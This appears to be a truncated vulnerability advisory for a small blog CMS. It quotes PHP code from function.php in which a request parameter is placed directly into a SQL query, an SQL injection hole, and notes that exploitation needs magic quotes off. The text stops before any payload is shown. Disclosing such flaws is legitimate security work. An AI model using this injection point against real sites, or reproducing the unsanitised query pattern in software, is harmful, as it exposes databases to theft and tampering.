#Thanks: r3dm0v3,M3hr@n.s ,pejvak, am!rkh@n
##########################################################

#DESCRIPTION (by vendor):#################################
A small but complete cms for blogs, and personal page, with file manager
and download area.

#BUG:#####################################################
file: function.php
365: if(isset($_POST['submit'])){
366: $categ = ($_REQUEST['categorie']);
367: $query="Select * from sbc_links where idlink>0 and category =
'$categ'" or die();
368: }
369: $result= mysql_query($query);

#EXPLOIT:#################################################
magic quotes must be off

READMORE